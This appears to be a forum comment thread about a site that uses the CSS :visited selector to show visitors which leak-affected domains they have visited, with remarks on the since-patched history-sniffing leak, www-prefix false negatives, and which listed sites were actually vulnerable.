Right, so this site uses CSS selectors to show the user a different colour for each site they've visited.
In the past the site would also be able to access the different style information rendered by the browser and use it to find out which sites you'd visited. Luckily that privacy leak was patched up a while ago: https://blog.mozilla.org/security/2010/03/31/plugging-the-cs...
Now you'd have to do something like use timing attacks on the browser's cache... :)
Or, since you're encouraged to hover or click on each highlighted block, Javascript could leak your information once you interact. There's no protection from the human-in-the-loop leaking their own privacy.
There are some false negatives here as they're linked to without the www. I haven't visited https://okcupid.com but I have visited https://www.okcupid.com. Therefore, it doesn't have a red dot when it should.
For a temporary fixed, I prepend 'www.' to all the links. It could be improved by having all the related frequently-used url of the sites listed e.g. other subdomains. Thanks!
One thing I didn't see discussed at all (mind you, there were thousands of comments on various threads) was crowd sourcing the search for exploited domains in people's browser cache (as opposed to search engine and archive caches).
If I understand this, it "simply" matches against the already known list of known to have leaked domains. Right? But what about potential other leaks that didn't get cached by search engines but that might live in people's caches??
One of the included sites is agilebits.com, but they're not actually vulnerable (all of the important traffic there is encrypted separately so even with TLS broken their users aren't vulnerable).
But I see you're using the :visited pseudo-class. That's actually quite genius!